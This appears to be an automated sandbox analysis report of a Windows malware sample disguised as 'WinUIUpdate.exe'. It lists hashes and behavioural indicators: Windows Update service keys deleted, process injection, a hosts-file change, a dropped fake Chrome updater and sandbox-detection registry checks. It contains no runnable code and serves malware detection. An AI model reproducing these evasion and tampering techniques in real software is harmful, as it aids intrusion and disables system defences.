Analysis
-
max time kernel
267s -
max time network
237s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
20-03-2023 12:07
Static task
static1
Behavioral task
behavioral1
Sample
WinUIUpdate.exe
Resource
win10-20230220-en
General
-
Target
WinUIUpdate.exe
-
Size
3.7MB
-
MD5
b0a84e4330a9c00c57d3a3e7885f7946
-
SHA1
bfe5f9b94081c25827e2bc90bb39a8c701033519
-
SHA256
6320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04
-
SHA512
a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f
-
SSDEEP
98304:xGUMWoCIILMDNCl6b54+TUyscvBDw4pn:AGosIslo46UF8
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 4756 created 4040 4756 WerFault.exe 58 PID 1456 created 3912 1456 WerFault.exe 100 PID 320 created 1824 320 WerFault.exe 125 PID 3748 created 4192 3748 WerFault.exe 133 -
Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs
description pid Process procid_target PID 4192 created 3148 4192 WinUIUpdate.exe 45 PID 4192 created 3148 4192 WinUIUpdate.exe 45 PID 4192 created 3148 4192 WinUIUpdate.exe 45 PID 4192 created 3148 4192 WinUIUpdate.exe 45 PID 4192 created 3148 4192 WinUIUpdate.exe 45 PID 1800 created 604 1800 powershell.EXE 3 PID 5032 created 4040 5032 svchost.exe 58 PID 5032 created 3912 5032 svchost.exe 100 PID 5032 created 4652 5032 svchost.exe 102 PID 5032 created 3912 5032 svchost.exe 100 PID 5032 created 2120 5032 svchost.exe 123 PID 5032 created 1824 5032 svchost.exe 125 PID 5032 created 1824 5032 svchost.exe 125 PID 5032 created 4872 5032 svchost.exe 128 PID 5032 created 4192 5032 svchost.exe 133 PID 5032 created 4192 5032 svchost.exe 133 -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts WinUIUpdate.exe -
Stops running service(s) 3 TTPs
-
Drops file in System32 directory 13 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 sysmon.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 4192 set thread context of 5032 4192 WinUIUpdate.exe 90 PID 1800 set thread context of 2500 1800 powershell.EXE 95 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\chromeupdater.exe WinUIUpdate.exe -
Drops file in Windows directory 12 IoCs
description ioc Process File created C:\Windows\INF\netsstpa.PNF svchost.exe File created C:\Windows\INF\netrasa.PNF svchost.exe File created C:\Windows\rescache\_merged\3060194815\2825129510.pri SystemSettings.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri Explorer.EXE File opened for modification C:\Windows\Debug\ESE.TXT DllHost.exe File created C:\Windows\rescache\_merged\3060194815\2825129510.pri RuntimeBroker.exe File opened for modification C:\Windows\Debug\ESE.TXT DllHost.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri ApplicationFrameHost.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri SystemSettings.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri RuntimeBroker.exe File created C:\Windows\rescache\_merged\1742034116\2462578334.pri SystemSettings.exe File created C:\Windows\rescache\_merged\4129138312\2114356439.pri RuntimeBroker.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2948 sc.exe 3756 sc.exe 4628 sc.exe 3652 sc.exe 4656 sc.exe -
Program crash 12 IoCs
pid pid_target Process procid_target 1136 4040 WerFault.exe 58 1208 4604 WerFault.exe 57 4756 4040 WerFault.exe 58 4716 3912 WerFault.exe 100 4876 4652 WerFault.exe 102 1456 3912 WerFault.exe 100 3108 2120 WerFault.exe 123 4520 1824 WerFault.exe 125 320 1824 WerFault.exe 125 4012 4872 WerFault.exe 128 4160 4192 WerFault.exe 133 3748 4192 WerFault.exe 133 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 SystemSettings.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\cc176cd7_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 svchost.exe Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache sysmon.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1679317701" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={0324A6DC-B1E9-4DA0-A3C9-1BF5FB29AA43}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sysmon.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\1e\52C64B7E svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sysmon.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA 